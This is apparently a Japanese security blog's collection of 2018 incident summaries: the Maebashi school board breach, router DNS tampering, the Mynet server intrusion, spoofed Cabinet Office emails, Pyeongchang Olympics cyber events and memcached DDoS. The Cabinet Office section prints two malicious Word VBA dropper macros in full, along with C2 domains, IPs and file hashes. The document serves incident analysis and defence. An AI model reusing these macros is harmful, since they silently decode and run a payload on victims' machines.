前橋市教育委員会への不正アクセスについてまとめてみた

2018年4月4日前橋市教育委員会前橋市教育情報ネットワーク(MENET)が不正アクセスを受け、校務用サーバーから児童生徒の個人情報等が漏えいした可能性があると発表しました。ここでは関連情報をまとめます。

公式発表

インシデントタイムライン

日時出来事
2017年8月中旬から公開サーバーに対し3000回以上の不正アクセスが発生。
2018年3月6日何者かが校務用サーバー不正アクセス
2018年3月16日前橋市教育委員会職員不正アクセス痕跡を覚知。
2018年3月28日前橋市教育委員会不正アクセスが確認され調査中と発表。
2018年3月30日委託先の調査会社より情報漏えいの可能性があると前橋市教育委員会へ報告。
2018年4月4日前橋市教育委員会不正アクセスによる情報漏えいがあったと記者会見し発表。
2018年4月12日前橋市市長が定例記者会見で情報漏えいの可能性について陳謝。
2018年4月16日第三者調査委員会第1回目会合が開催。

被害状況

概要を整理すると次の通り。

f:id:Kango:20180405032747p:image

被害の詳細
対象件数漏えいした恐れのある項目
平成29年11月時点で前橋市立小中特別支援学校在籍の
児童・生徒の個人情報
25,725件・学年
・組
・出席番号
・氏名
・性別
・生年月日
国籍
・住所
電話番号
・保護者氏名
アレルギー
・既往症
平成29年2月〜7月の間に前橋市立公立学校(園)で給食喫食していた
園児児童生徒及び教職員の口座情報
19,932件・銀行名
・支店名
・口座番号
・名義人氏名
過去8か月間での不正アクセス被害

発端

不正アクセスの手口

原因

対応

第三者調査委員会

次のメンバーより構成される。*13

小暮俊子氏弁護士調査委員会 委員長
横山重俊氏群馬大総合情報メディアセンター教授
青嶋信仁氏株式会社DIT セキュリティサービス事業部 事業部長

(参考)MENET関連情報

職員ネットワーク主に業務(校務)での利用を目的としたネットワークで,利用者は教職員のみとする。各学校園で,校長室,職員室,保健室,事務室等に敷設された有線ネットワーク
児童生徒系ネットワーク主に授業での利用を目的としたネットワークで,利用者は児童生徒及び教職員とする。教室,特別教室,体育館等に敷設された有線及び無線ネットワーク。尚,災害時の避難場所として学校を提供する場合は,一時的に地域住民も利用することができる。
データセンター校務系サーバー、授業系サーバー、認証・管理系サーバーなど設置。インターネットにも接続。

新聞報道

新聞社日付見出し
読売新聞2018年4月5日朝刊児童ら2万5000人情報流出 前橋 市教委に不正アクセス
朝日新聞2018年4月5日朝刊小中学生2.5万人 個人情報流出前橋 不正アクセス
毎日新聞2018年4月5日朝刊児童生徒2万人 個人情報流出前橋不正アクセス
東京新聞2018年4月5日朝刊児童個人情報流出前橋市教委 小中学校2万5000人分
日本経済新聞2018年4月5日朝刊個人情報4万件流出か前橋市教委
産経新聞2018年4月5日朝刊児童・生徒情報 4.5万件流出か 前橋市教委、サーバー更新怠る

更新履歴

*1前橋市教委サーバー 不正アクセスは8か月間に3000回以上,NHK,2018年4月6日アクセス

*2不正アクセス 3000件 昨年8月、前橋市教委に /群馬,毎日新聞年4月8日アクセス

*3前橋市教委のネットワークに /群馬,毎日新聞,2018年4月5日アクセス

*4前橋市教委 不正アクセス 2万人超の個人情報流出,毎日新聞,2018年4月5日アクセス

*5不正アクセス 小中学生の個人情報流出か(群馬県),NNN,2018年4月5日アクセス

*6前橋市教委サーバー 昨夏、外部から3000回超攻撃 先月、情報流出か,産経ニュース,4月6日アクセス

*7個人情報4万5千件流出か 前橋市教委、児童名など ,日本経済新聞,2018年4月5日アクセス

*8前橋市の個人情報流出問題 内部規則、十分順守せず,東京新聞,2018年4月10日アクセス

*9小中学生ら個人情報流出か=2万5000人分−前橋市教委,時事通信,2018年4月5日アクセス

*10前橋市教委サーバー不正アクセス ずさんな情報管理浮き彫り,産経ニュース,2018年4月5日アクセス

*11前橋市の情報流出問題 山本市長が会見で陳謝「大変な不安与えた」,東京新聞,2018年4月13日アクセス

*12個人情報流出で第三者委 初会合で委員委嘱 前橋市教委,上毛新聞,2018年4月17日アクセス

*13不正アクセス問題 前橋市教委、第三者委議事録作成せず 「丸投げいいのか」指摘も /群馬,毎日新聞,2018年4月17日アクセス

*14: [PDF] MENETにおいて扱う情報の保護に関する規則

ルーターの設定情報改ざんについてまとめてみた

2018年2月末頃から何者かによるルーター内の設定情報が書き換えられる被害が報告されています。改ざんによりインターネットへ接続できなくなったり、マルウェア配布サイトへ誘導されたりする事象が発生し、日本国内でも3月半ばぐらいから同様の事象が報告があがっています。

ここでは関連情報をまとめます。

確認されている被害事象

(1) ルーターの設定情報が改ざんされる
(2) マルウェア配布サイトへ誘導される
確認時期表示されるメッセージの例ダウンロードされるファイル名
2018年3月半ばFacebook拡張ツールバッグを取付て安全性及び使用流暢性を向上します。facebook.apk
2018年3月下旬閲覧効果を良く体験するために、最新chromeバージョンへ更新してください。chrome.apk

改ざん被害が報告されているルーター

Logitecルーター対象機種(報告が上がっているもの)
Buffaloルーター対象機種(報告が上がっているもの)
NTT東日本NTT西日本ルーター対象機種
Kasperskyの観測情報

改ざんされる原因

(1)本機器をインターネット接続用途で利用している場合。

(2)インターネット接続設定でセキュリティ設定を無効にして利用している場合。

(3)機器設定用ログインパスワードを初期値より変更していない場合。

ロジテックルーターをお使いのお客様で本事象が発生している場合は、ご利用機器の設定を変更いただくことで解消いたします。

設定の変更方法については、下記の窓口にお問い合わせください。

改ざん被害を受けた場合

報告事例・報道など(関連が疑われるもの含む)

韓国
日本

新聞報道

新聞社日付見出し
朝日新聞2018年3月27日朝刊ルーターサイバー攻撃NTT法人向け機器
読売新聞2018年3月31日夕刊ルーター設定 無断変更 被害相次ぐ スマホ情報抜き取り
朝日新聞2018年4月6日朝刊ルーター被害 NTT以外も サイバー攻撃 PC・スマホ接続不可に
日本経済新聞2018年4月6日夕刊サイバー攻撃 ルーター狙う 個人情報盗む目的か

更新履歴

*1https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11187751811

*2ルーターにサイバー攻撃、NTT以外も ネット使えず,朝日新聞,2018年4月6日アクセス

*3https://twitter.com/mikenekoyuzu/status/976593490489430017

*4http://blog.maxx.co.jp/?eid=362

*5https://productforums.google.com/forum/#!msg/chrome-ja/coU655lLpRA/RYCCYYMJCQAJ

マイネットへの不正アクセスについてまとめてみた

2018年3月1日頃、マイネットグループの株式会社マイティゲームスのサーバーに対し不正アクセスが行われ、運営する複数のゲームサービスでシステム障害が発生しました。

ここでは関連情報をまとめます。

公式発表

(公式発表の一部は更新が適宜行われているため、最初に公開された日付を記載しています。)

インシデントタイムライン

日付出来事
2018年3月1日 11時頃何者かがマイネットの内部ネットワーク侵入し、サーバー不正アクセス
サーバー上のデータ削除スクリプトを実行。(1回目の不正アクセス
〃 11時40分マイネットシステム部門の担当者がサーバーから発出されたアラートを検知。
また同タイミングにて複数サービスにてシステム障害の発生を確認。
〃 12時頃マイネットのゲームサービス13個でシステム障害が発生。
〃 13時00分頃影響が確認されたサービスを緊急メンテナンスへ順次移行を開始。
〃 13時10分頃障害発生が確認されたサーバーが稼動している都内データセンターで調査を開始
〃 14時00分頃都内データセンター内のサーバーで異常が無いことを確認。
〃 19時00分頃不正アクセスに利用されたと見られるサーバーの特権IDでサーバーのデータを削除するスクリプトを発見。
サーバーログインパスワードの変更を実施。
〃 19時30分頃サービス影響が確認されていないタイトルから順次再開
2018年3月2日 1時頃までマイネットが影響が出たタイトル7つを再開。
〃 3時30分頃までマイネットが影響が出たタイトル2つを再開。(合計9個が再開。)
2018年3月3日 0時頃マイネットが影響が出た残りのタイトルを再開。(合計12個が再開。)
〃 17時30分頃何者かがVPN経由でマイネットのサーバー不正アクセス。データ削除コマンドを実行。(2回目の不正アクセス)
〃 17時40分頃マイネットのサービス担当者がサーバーデータベースが消失していることを確認。
〃 19時頃マイネットが複数のサービスにて不具合の発生を確認。
〃 同じ頃調査の結果、同一IPアドレスから複数アカウントVPN へのアクセスおよびサーバーへのログインが確認された。
対象のVPNアカウント及びVPN自体を全て停止。
〃 19時30分頃マイネットが当該事案が不正アクセスの可能性が高いと判断。
不正アクセスされたサーバーと類似環境にて運営中のサービス停止を決定。
〃 同じ頃緊急対策チームの組成を実施。初動対応に着手。
2018年3月4日 1時頃マイネットが3日18時頃から複数タイトルで障害が発生していると発表。
〃 21時45分マイネットが警察へ通報。
2018年3月7日以降マイネットがサービスの再開作業を開始。
2018年3月15日 15時00分頃マイネットがサービス3つを再開。
2018年3月16日 12時30分頃マイネットがサービス1つを再開。(合計4個が再開。)
2018年3月19日 12時00分頃マイネットがサービス2つを再開。(合計6個が再開。)
2018年3月19日 15時00分頃マイネットがサービス1つを再開。(合計7個が再開。)
2018年3月20日 17時00分頃マイネットがサービス2つを再開。(合計9個が再開。)
2018年3月20日 19時00分頃マイネットがサービス2つを再開。(合計11個が再開。)
2018年3月22日 12時00分頃マイネットがサービス1つを再開。(合計12個が再開。)
2018年3月22日 15時00分頃マイネットがサービス1つを再開。(合計13個が再開。)
2018年3月26日マイネットが同社サービスへの不正アクセス中間調査報告書を公開。
2018年4月17日マイネットが最新の障害対応状況を報告。
2018年4月18日マイネットが最新の障害対応状況を報告。

被害の状況

不正アクセスの概要

f:id:Kango:20180327034512p:image

システム障害が発生したサービス
Noタイトル名稼働環境稼働状況
1天下統一オンラインMobage3月15日15時頃再開
2GREE3月15日15時頃再開
3dゲーム3月22日15時頃再開
4タイトル(タイトル名非公開)<海外地域>不明3月15日15時頃再開
5〃 <国内地域>不明3月23日16時時点で停止中
6熱血硬派くにおバトルMobage3月16日12時30分頃再開
7HUNTER×HUNTER バトルコレクション<ForGroove 提供>Mobage3月19日12時頃再開
8Ameba3月23日16時時点で停止中
9dゲーム3月23日16時時点で停止中
10HUNTER×HUNTER アドバンスコレクション<ForGroove 提供>Yahoo!モバゲー3月19日12時頃再開
11HUNTER×HUNTER トリプルスターコレクション<ForGroove 提供>GREE3月22日12時頃再開
12究極×進化!戦国ブレイクYahoo!モバゲー3月19日15時頃再開
13ラグナブレイク・サーガYahoo!モバゲー3月20日17時頃再開
14DMM GAMES3月20日17時頃再開
15アヴァロン ΩAndroid3月20日19時頃再開
16iOS3月20日19時頃再開
17アヴァロンの騎士dゲーム3月23日16時時点で停止中
18GREE3月23日16時時点で停止中
19Mobage3月23日16時時点で停止中
20神魔×継承!ラグナブレイクAmeba3月23日16時時点で停止中
21dゲーム3月23日16時時点で停止中
22GREE3月23日16時時点で停止中
23mixi3月23日16時時点で停止中
24Mobage4月17日15時頃再開
25ファイナルファンタジー グランドマスターズスクウェア・エニックス提供>Android3月23日16時時点で停止中
26iOS3月23日16時時点で停止中
27ミリオンアーサー エクスタシスdゲーム4月18日15時頃再開
28GREE4月18日15時頃再開
29Mobage4月18日15時頃再開
30コロプラ4月18日15時頃再開
マイネットのサービス再開基準
その他関連する情報

マイネットのサーバー不正アクセスを受けた原因

窃取されたとみられるクレデンシャル盗んだ方法
ビジネスチャットツール(5アカウント)中間報告の段階では判明せず
VPNアカウント運用担当者間でビジネスチャット上でID、PWのやり取りが行われていた。
これが盗み見られた可能性がある。*1
グループウェアアカウント中間報告の段階では判明せず
グループ内のActive Directory中間報告の段階では判明せず
不正アクセスで確認された行為

何者かが行った不正アクセス行為は以下の通り。

2018年3月1日特権IDを用いてデータを削除するスクリプトを実行。
2018年3月3日データ削除コマンドを実行。

マイネットが行った対処内容

初動対応原因の調査
ユーザーのゲームデータの保全
開発環境の復旧
サービス再開に必要なセキュリティ対策の実施
他タイトルへの影響調査
復旧対応サービス再開に必要なセキュリティ対策
データ保全方法の強化
サーバーの復旧
一部データの復元
など
再発防止抜本的な情報セキュリティ強化対策を取るプロジェクトの立ち上げ
外部の専門アドバイザー等の再発防止への取り組み
追加で調査必要と判断した場合は、第三者による調査等の検討

更新履歴

*1「チャットから管理者IDが漏洩」、マイネットがスマホゲーム障害で公表,日経XTECH,2018年3月27日アクセス

2018年3月の内閣府のなりすましメールについてまとめてみた

2018年3月12日頃、内閣府の総合海洋政策推進事務局になりすましたメールが確認されたとの参考情報を得ました。

ここではなりすましメールの関連情報をまとめます。

詐称メールの情報

詐称メールの情報を整理すると次の通りです。

確認された時期2018年3月12日(月)昼頃
差出人名無し(送信元アドレスそのまま表記)
送信元アドレス ******_0****@yahoo.co.jp
件名新旧参与会議意見書の比較
本文**先生

大変お世話になっております。
内閣府総合海洋政策推進事務局でございます。

新旧参与会議意見書の比較につき、情報共有いたします。
よろしくご査収願います。
**拝

--------------------
内閣府総合海洋政策推進事務局
参事官補佐
** *(**** ******)
MAIL: **************@cao.go.jp
TEL: 03-6257-****
--------------------
添付ファイル有り

添付ファイルの情報

ドキュメント上部の黄色のメッセージバーを注してください。

1.「編集を有効にする」をクリックします。

2.「コンテンツの有効化」をクリックします。

Private Sub Document_Close()
Dim ZaRmOsIFuGrHzCUw As Long
Dim HfNoBoTFzClPnIKu As String
HfNoBoTFzClPnIKu = Environ("temp") & "\UiHxUvNNtFiTaXZl"
ZaRmOsIFuGrHzCUw = ActiveDocument.Content.End
Set FzQcYhSAgUcYcNVu = ActiveDocument.Range(1, ZaRmOsIFuGrHzCUw)
Set LhEtKtONyFfQwSOp = CreateObject("Scripting.FileSystemObject")
Set JpKzRgIXpSnJuHNd = LhEtKtONyFfQwSOp.CreateTextFile(HfNoBoTFzClPnIKu, True)
JpKzRgIXpSnJuHNd.WriteLine (FzQcYhSAgUcYcNVu)
JpKzRgIXpSnJuHNd.Close
Set UwZhPzKHoBiMmRIb = CreateObject("Wscript.Shell")
UwZhPzKHoBiMmRIb.Run "cmd.exe /c certutil -decode %temp%\\UiHxUvNNtFiTaXZl %temp%\\ViLlOmGPlPmIhLHa", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c expand %temp%\\ViLlOmGPlPmIhLHa -F:* %temp%\\", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\UiHxUvNNtFiTaXZl", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\ViLlOmGPlPmIhLHa", 0, False
Set UwZhPzKHoBiMmRIb = Nothing
Set LhEtKtONyFfQwSOp = Nothing
End Sub

関連が疑われる情報

【上部の黄色のメッセージ バーが表示された状態で】

「編集を有効にする」をクリックします。その後、「コンテンツの有効化」ボタンをクリックします。

Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True)
DGHjIKbFRghjH.WriteLine (crHJUgVD)
DGHjIKbFRghjH.Close
Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True
uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True
uVFTyuiVGT.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
Set uVFTyuiVGT = Nothing
Set jIHiuHY = Nothing
End Sub

Private Sub Document_New()

End Sub

インディケーター情報

ファイル
ファイル名ハッシュ値
新旧参与会議意見書の比較.doc36fb6eb6c46a517391c722046c769a31283b784738f2b4ab62a4accb0528b0e0
世界経済アウトルック.doc5788b5a50cf8057f138a585221bb55498987a3510fe4e60b38aaa803bddbe1e9
通信先
URLIPアドレス
samiratikhonova[.]camdvr[.]org185[.]80[.]53[.]206
friendlysupport[.]giize[.]com83[.]136[.]106[.]108

更新履歴

平昌五輪のサイバー関連の出来事をまとめてみた

2018年冬季オリンピック(平昌大会)に関連するサイバー空間上で起きた出来事をまとめます。

1.平昌大会に関連する不審な文書ファイル付きメール/Gold Dragon

(1) McAfeeが報告した不審メール
時期件名送信先送信先送信元FROM実際の送信元
2017年12月22日위험 경보 (전국야생조류 분변 고병원성 AI(H5N6형) 검출).docxHTAファイル埋め込み情報なし情報なし情報なし
2017年12月28日농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.docマクロ埋め込みyj.kim@pyeongchang2018.com
ticketeting@pongchang2018.com
yeongseong.choi@pyeongchang2018.com
sanghee.cho@pyeongchang2018.com
icehockey@pyeongchang2018.com
info@nctc.go.krospf1-apac-sg.stickyadstv.com
43.249.39.152(シンガポール)
c388b693d10e2b84af52ab2c29eb9328e47c3c16
(2) 警察庁が報告した不審メール
時期件名件名送信先送信元FROM実際の送信元
2018年2月6日협박전화테러 예방.doc협박전화테러 예방sungwon.kim@kt.cominfo.kr@nctc.go.kr (表示:경찰청)情報なし
(3) Hauriが報告した不審メール
(4) Gold Dragon

2.Adobe Flash Palyer 0day

(1) KrCERT
(2) Adobe のセキュリティ情報
(3) セキュリティベンダの分析情報
(4) 攻撃の流れ概要
fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
hxxp://www.1588-2040[.]co.kr/conf/product_old.jpg
hxxp://www.1588-2040[.]co.kr/design/m/images/image/image.php
hxxp://www.korea-tax[.]info/main/local.php
hxxp://www.dylboiler[.]co.kr/admincenter/files/board/4/manager.php
(5) APT37が悪用した脆弱性

3.平昌五輪のイベントプログラムを偽装したマルウェア

OlympicGame.exe:d1ae2012fdbdbe9d8246d23f2fe4efa6865689d44cb7c7d7664366b2934f7e14

4.チケットに関連する事象

(1) 平昌五輪に乗じた詐欺行為
(2) チケット転売サイトのダフ行為

5.ロシアが平昌大会へのサイバー攻撃を行うとの疑念

(1) Fancy Bears'HTの動向

以下はリーク先に示されたページの表題

(2) ThreatConnectが発見したなりすましドメイン
インシデントNo
(疑わしいドメイン等)
詳細
Incident 20180122A: Berlinger Group Spoofed Domains
berlingergroup.com
過去の攻撃で利用されたレジストラDomains4Bitcoinsを通じて登録されたドメイン
89.33.246.121の専用サーバでホストされている。
vahmudzoltev@mail.comを利用して登録されており、同じアドレスで「berlinqer.com」が登録されている。
「berlinqer.com」は「91.205.149.202」でホストされている。これは正当なドメインのホスト先と同じ。
ただしmail.berlinqer.comは、berlingergroup.comをホストする同じ89.33.246.121が示されている。
berlinger.cloudは同じvahmudzoltev@protonmail.comを利用して登録されている。
このドメインが攻撃に利用されていたことは示していない。
Incident 20180119A: UKAD Spoofed Domain
login-ukad.org.uk
英国アンチドーピング機関のドメインに類似。
過去の攻撃で利用されたレジストラDomains4Bitcoinsを通じて登録されたドメイン
ホストされたIPは「185.189.112.191」である。
米国のアンチドーピング機関の偽装ドメインがホストされていたIPアドレスと同じブロックである。
SOAはluciyvarn@protonmail.comが登録されている。
同じメールアドレスで他にもukad.cloudが登録されている。
adfs-ukad.org.ukはlogin-ukad.org.ukと同じ組織名「Zender inc、同じアドレスの文字列「Vapaudenkatu 57」が利用されていた。
このドメインが攻撃に利用されていたことは示していない。
Incident 20180110B: Olympic Council of Asia Spoofed Domain
ocaia.org]
12月25日にTHCServersで登録された。
このサービスは過去に使用されたものと同じである。
アジアのオリンピック評議会「ocasia.org」のドメインに類似。
このドメインにホストされたIP「193.29.187.143」はほかに6つのドメインを共存している。
FancyBearは専用サーバーを用いることが多いが、登録時期と内容から精査する価値がある。
Incident 20180103C: Domains Registered by wadison@tuta.io
networksolutions.pw
23.227.207.182
過去の攻撃で利用されたレジストラDomains4Bitcoinsを通じて登録されたドメイン
専用サーバーの登録は過去にWADAの偽装ドメインの登録に使用されたメールアドレス「wadison@tuta.io」が使われている。
このドメインは現在利用されていない。
同じ電話番号で登録されたドメイン「spiderclix.com」、アドレス「spider.worker163@yandex.com」を確認したが不確実性がありより低い脅威評価を行っている。
Incident 20180103B: USADA Spoofed Domains
webmail-usada.org
米国のアンチドーピング機関 USADAのなりすまし偽装の疑念があるドメイン
185.189.112.242がホストされていた。
ドメインのSOAレコードとしてjeryfisk@tuta.ioが使用されていた。
別のUSADAをなりすます「usada.eu」にも使用されていたメールアドレスであった。
このドメインは運用に使用されていると評価はしていない。また必ずしもFancyBearに帰属しているものでもない。
(3) ワシントンポストの報道
(4) ロシア外務省の声明

6.米国関連組織の動き

(1) 平昌大会観光客へUS-CERTの注意喚起
(2) NCFTAのサイバーセキュリティ上の脅威に関する言及

7.開会式中のシステム障害/Olympic Destroyer

以下にまとめている。

8.炎上・誹謗中傷

(1) 平昌五輪公式サイトで日本列島の表記消滅
(2) ナ・ギョンウォン議員平昌オリンピック委員職を罷免
(3) 国際放送センターのカフェテリア食事写真炎上
(4) 韓国鉄道公社(KORAIL)への不満多数
(5) NBC解説者の開会式発言炎上

(6) 五輪参加選手への誹謗中傷
誹謗中傷を受けた選手概要
김보름選手(韓国)スピードスケートパシュート女子準々決勝
同試合ゴールで同選手は一緒に出場した他2選手を大きく引き離しゴール。
準決勝進出を逃した19日のパシュート試合後、仲間の遅れが原因ともとれる発言をした。
SNSに中傷が殺到し、非公開となった。
大統領府のホームページで国家代表資格の剥奪を求める請願に35万人以上が賛同を示した。
翌20日の記者会見で涙ながらに謝罪した。
Kim Boutin選手(カナダ)スピードスケート ショートトラック女子
500メートル決勝で同選手を押したとして韓国のチェ・ミンジョン選手が失格
Facebookなどに「殺してやる」との殺害予告等中傷する投稿が1万件確認された。*19
カナダ当局が選手保護に乗り出したとの報道
韓国当局も捜査を行い、繰り返し投稿している1名を聴取すると報道*20
ブタン選手のSNSには「ブタンも崔選手を押した」「反則でメダルを取った。恥を知れ」との韓国語や英語の非難が殺到、コメントは1万件を超えた
COCはこの事案についての声明を発表。
COC statement regarding Kim Boutin
최민정選手(韓国)スピードスケート ショートトラック女子3000mリレー決勝
2位でゴールした中国代表チームが失格
3週を残してアウトからインコースに入ってこようとしその際に韓国選手に反則行為をしたため。
中国代表は自国のインタビューに試合結果を受け入れるのは難しいとコメント
失格を通じ韓国の選手のSNS(Instagram)に中国語で書かれた悪質な書き込みが殺到
韓国がどれほど卑劣か分かった」「韓国中国の属国だ」等。*21
Jan Blokhuijsen選手(オランダ)スピードスケート 男子パシュート。
競技後の記者会見で「Please treat dogs better in this country」と発言。*22
当初中央日報電子版が「犬を食用にしないでください」と誤訳した。*23
犬肉食用文化を批判するものとして炎上。
メディアFacebookページに発言に対する批判の書き込みが複数。
同選手はTwitterで謝罪コメントを掲載したがその後そのツイートは削除された。*24

9.平昌オリンピックに関係する数字

数字内容
20万ウォン〜200万ウォン平昌大会に関連する詐欺事件の被害金額。
16件「平昌」、「オリンピック」で検索された結果2月11日報道時点で確認されたチケットの詐欺件数
25サイト監視が行われていたWebサイトの数。公式サイト、チケット購入、聖火リレー等。
2万7000件2月14日にシステムに対して行われた攻撃を検出した件数
4500件2月18日にシステムに対して行われた攻撃を検出した件数

10.平昌大会中のサイバーセキュリティ対策・体制

(1) 情報保護委員
(2) 技術分科委員
(3) サイバーガーディアンズ
名前主な業績
シムジュンボ(심준보이사)代表(ハッカー連合HARU)ハッキングコミュニティ連合会長として活動中
ギムジングク(김진국 대표)代表(プレーンビット)デジタルフォレンジック分野専門家
イ・ジョンホ(심준보이사)研究員(ラオンセキュア)DEFCON、SECCONなど多数のサイバーセキュリティの国際大会で1位を収めた
河東州(최상명)最高技術責任者(NSHC)DEFCON出場4回の実績
ムンジョンヒョン(심준보이사)部長(イーストソフト)民・軍・警察のサイバー侵害事故防止の専門家
チェサンミョン(최상명 실장)室長(ハウリ)3.20サイバーテロを初めて認知。IssueMakersLabリーダー
ギムギョンゴン(김경곤)教授(高麗大)セキュリティコンサルティングとセキュリティ診断の専門家
(4) Ahnlab
(5) サイバーセキュリティに係る予算
(6) オリンピックCERT
参加組織役割
青瓦台国家安保室 サイバー安保秘書官室CERTの主導を担う。
国家情報院 国家サイバー安全センター 
文化体育観光部 サイバー安全センター 
科学技術情報通信部 インターネット侵害対応本部利用者情報保護のヒントを配布する等して適切な情報保護措置を取るように要請。
韓国インターネット振興院(KISA)DDoS攻撃のモニタリング、サイバー攻撃兆候の24時間体制での監視。(5名)
警察庁 サイバー安全局KISAと連携し、脅威の拡散行為などの遮断措置を担当。
国防省 サイバー司令部五輪関連ホームページの運営を支援。(4人(五輪)、3人(パラ))
AhnlabPCなどのエンドポイントセキュリティを担当
IGLOO SECURTIY侵害への対応、セキュリティコンサルティングの提供。
サイバーガーディアンズ国内最高の民間セキュリティ技術の専門家らで構成。公式サイトの脆弱性検査を行う。
AtoS開発、及びセキュリティ監視
KTデータセンターの運用、セキュリティ監視
双竜情報通信開発・個人情報保護
アカマイ主要な五輪のサービスの保護
(7) 脆弱性分析チーム
(8) 科学技術情報通信部
ヒント主な内容
知らない人からの電子メール、ファイルは開いて見ていない・メールを送信した送信者(送信者)の名前とメールアドレスは、もう一度確認
・知らない人からのイベント当選文字、宅配便米受領文字などに含まれているリンクは、添付ファイルなどは、ダウンロードして実行していないことが最善
・添付ファイルをダウンロード受けたり関連リンクをクリックした場合には、必ずワクチンで検査して悪性コードの有無を確認し、必要な信頼できないWebサイトは、訪問していない.
P2P、トレントなどのセキュリティが脆弱なファイル共有サイトは訪問を自制・共有サイト訪問が避けられない場合には、必ず対策プログラムの最新の更新プログラムと有効
公式マーケットからアプリダウンロードする・公式マーケット(アプリストア、Googleのプレイストア)とキャリアマーケット(ウォンストア)内の認証されたエプマン使用
・ワクチンプログラムをインストールしてウイルススキャンする
・使用するPCとスマートフォンでは、ワクチンプログラムのインストール
・定期的なワクチンプログラムの更新や検査などの安全なPCとスマートフォンを維持
オペレーティングシステムおよびソフトウェアは、自動更新の設定・利用者が使用しているオペレーティングシステムとソフトウェアは、新規セキュリティパッチが自動的に更新されるように設定する必要
・メーカーが定期的にセキュリティ更新プログラムをサポートしている本物のプログラムの使用をお勧めし重要データは、別の記憶媒体に保存
・ランサムウェアなどの被害を最小化するために重要なデータは必ず別に分離された媒体(USB、外付けハードなど)にバックアップして管理
PC内の共有フォルダは、外部からの不正なアクセスが可能なので、使用を控える・共有フォルダを使用する場合には、アルファベット、数字、特殊文字などの3つのタイプを使用して、ハッカーが類推しにくいパスワードを作成して使用
パスワードを設定して定期的に変更する・利用者が使用するパスワードは、他人が類推しやすい名前、誕生日、電話番号などの個人情報と関連した内容は、使用禁止
・周期的なパスワードの変更にハッキング、個人情報の流出などの利用者被害予防

更新履歴

*1http://www.dailysecu.com/?mod=news&act=articleView&idxno=29636

*2http://news.joins.com/article/22350751

*3https://vpoint.jp/world/korea/107607.html

*4http://biz.heraldcorp.com/view.php?ud=20180210000038

*5https://www.nikkansports.com/olympic/pyeongchang2018/general/news/201802210000804.html

*6http://news.joins.com/article/22339291

*7https://www.reuters.com/article/us-olympics-2018-cyber/games-organizers-confirm-cyber-attack-wont-reveal-source-idUSKBN1FV036

*8http://www.etnews.com/20180131000459?SNS=00002

*9http://www.sankei.com/politics/news/170927/plt1709270046-n1.html

*10http://www.sankei.com/life/news/170927/lif1709270036-n1.html

*11http://www.vop.co.kr/A00001245760.html

*12http://mnews.joins.com/article/22309070#home

*13https://www.dispatch.co.kr/1121120

*14http://www.nocutnews.co.kr/news/4919029

*15http://news.nate.com/view/20180210n11312?mid=n1007

*16http://japanese.yonhapnews.co.kr/enter/2018/02/11/1001000000AJP20180211000900882.HTML

*17https://jp.reuters.com/article/olykorea-idJPKBN1FW06C

*18http://biz-journal.jp/2018/02/post_22362.html

*19http://www.sankei.com/pyeongchang2018/news/180215/pye1802150029-n1.html

*20http://www.sportalkorea.com/general/view.php?gisa_uniq=201802151808776261&key=&field=&section_code=D1000

*21http://news.donga.com/Top/3/05/20180221/88767920/2

*22http://japanese.joins.com/article/921/238921.html

*23http://www.sankei.com/pyeongchang2018/news/180222/pye1802220052-n1.html

*24https://www.newsweekjapan.jp/stories/world/2018/02/post-9591.php

*25https://www.sportsbusinessdaily.com/Daily/Issues/2018/02/20/On-The-Ground/Cyber-attacks.aspx

*26http://www.etnews.com/20160817000138?SNS=00002

*27https://www.newsweekjapan.jp/stories/world/2017/09/80-7.php

*28http://news.inews24.com/php/news_view.php?g_serial=1072573&g_menu=020200

*29http://news.donga.com/3/01/20180121/88291861/1?

*30http://www.yonhapnews.co.kr/bulletin/2018/02/07/0200000000AKR20180207086100017.HTML

memcached を悪用したDDoS攻撃についてまとめてみた

2018年2月下旬にPort 11211に対するアクセス増加がみられるとしてJPCERT/CCが注意喚起を行いました。11211/udpポートはmemcachedでデフォルトで利用されているもので、JPCERT/CCは先の注意喚起で「memcached を踏み台として悪用したとみられる DDoS 攻撃の報告を受け取っています。」と攻撃への悪用についても報告しています。ここでは関連情報をまとめます。

タイムライン

日時出来事
2018年2月21日頃JPCERT/CCが11211/udpへのアクセス増加を確認。
同日頃からmemcachedを用いたとみられるDoS攻撃が観測。
2018年2月28日JPCERT/CCが11211/udpのアクセス制御に対する注意喚起を発表。
2018年3月1日 2時21分頃Githubを対象にしたピーク時 1.35Tbps規模のDDoS攻撃が発生。(1回目)
同日 3時頃Githubを対象にしたピーク時 400Gbps規模のDDoS攻撃が発生。(2回目)
2018年3月5日ArborNetworksがピーク時 1.7Tbps規模の攻撃を観測したと報告。

memcachedを悪用したDoS攻撃

memcachedを利用している場合

第三者がアクセス可能な状態で公開されている場合
Nmapを使った確認方法
$ nmap TARGET -p 11211 -sU -sS --script memcached-info

注意喚起等

攻撃観測

(1) DDoS Monでの観測状況

f:id:Kango:20180302061852p:image

(2) セキュリティベンダが観測したピークの攻撃規模
報告したセキュリティベンダ観測したDoS攻撃のピーク時最大規模
Akamai190 Gbps超
CLOUDFLARE257 Gbps
LINK11460 Gbps
IMPPERVA190 Gbps
Qrator Labs480 Gbps
Alibaba Cloud578.6 Gbps
(3) 国内の事例

ホスティングサービスを利用しているユーザーが踏み台とされたと報告している。

IIJの観測レポート

JPCERT/CCからの注意喚起にも記載されている、2月21日頃から件数が増加していることが確認出来ており、本攻撃に利用可能なホストを探索しているものと考えられます。

(4) GithubへのDDoS攻撃

観測されたDDoS攻撃の状況

発生日時ピーク時の攻撃規模サービス影響
